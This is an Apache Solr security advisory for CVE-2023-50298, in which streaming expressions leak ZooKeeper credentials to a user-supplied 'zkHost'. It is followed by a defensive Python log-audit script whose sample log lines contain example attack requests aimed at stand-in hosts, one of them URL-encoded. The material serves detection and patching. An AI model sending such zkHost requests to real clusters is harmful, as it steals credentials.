Severity: low
Affected versions:
- Apache Solr 6.0.0 through 8.11.2
- Apache Solr 9.0.0 before 9.4.1
Description:
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. This issue affects Apache Solr from 6.0.0 through 8.11.2 and from 9.0.0 before 9.4.1.
Solr Streaming Expressions allow users to extract data from other Solr Clouds, using a "zkHost" parameter.
When the original SolrCloud is set up to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides.
An attacker could set up a server to mock ZooKeeper that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost".
Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions.
Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.
This issue is being tracked as SOLR-17098.
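As an added example (not part of the advisory and not Apache Solr code), the following Python audits request-log lines for streaming expressions whose "zkHost" names a ZooKeeper outside an allowlist, which is the request shape described above. The allowlist hostnames and the log fragments are constructed assumptions; adapt both to your own ensemble and log format.

```python
import re
from urllib.parse import unquote_plus

# Assumption: the ZooKeeper ensemble this SolrCloud legitimately uses (constructed names).
ALLOWED_ZK = {
    "zk1.internal.example:2181",
    "zk2.internal.example:2181",
    "zk3.internal.example:2181",
}

# Matches zkHost="h1:2181,h2:2181/chroot" (quoted) or zkHost=h1:2181 (unquoted).
ZKHOST_RE = re.compile(r'zkHost\s*=\s*(?:"([^"]*)"|([^\s,)"]+))', re.IGNORECASE)


def zk_hosts(text):
    """Return every host:port named by a zkHost parameter in text."""
    hosts = []
    # Decode first so URL-encoded expressions are inspected as well.
    for quoted, bare in ZKHOST_RE.findall(unquote_plus(text)):
        connect = (quoted or bare).split("/", 1)[0]  # drop a chroot suffix such as /solr
        hosts.extend(h.strip().lower() for h in connect.split(",") if h.strip())
    return hosts


def flag_requests(lines, allowed=ALLOWED_ZK):
    """Return (line_number, unexpected_hosts) for requests naming a foreign zkHost."""
    findings = []
    for number, line in enumerate(lines, start=1):
        unexpected = [h for h in zk_hosts(line) if h not in allowed]
        if unexpected:
            findings.append((number, unexpected))
    return findings


# Constructed, simplified request-log fragments (not real Solr output).
SAMPLE_LOG = [
    'params={expr=search(books,zkHost="zk1.internal.example:2181/solr",q="*:*",fl="id")} status=0',
    'params={expr=search(books,zkHost="192.0.2.10:2181",q="*:*",fl="id")} status=0',
    'params={q=*:*&rows=10} status=0',
    'params={expr=search(books%2CzkHost%3D%22zk2.internal.example%3A2181%2C192.0.2.77%3A2181%22%2Cq%3D%22*%3A*%22)} status=0',
]

if __name__ == "__main__":
    for number, hosts in flag_requests(SAMPLE_LOG):
        print(f"line {number}: zkHost outside the allowlist: {', '.join(hosts)}")
```

Any finding on a version in the affected range means the cluster's ZooKeeper credentials may have been sent to the listed host.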
Credit:
Qing Xu (reporter)
References:
https://solr.staged.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions
https://solr.apache.org
https://www.cve.org/CVERecord?id=CVE-2023-50298
https://issues.apache.org/jira/browse/SOLR-17098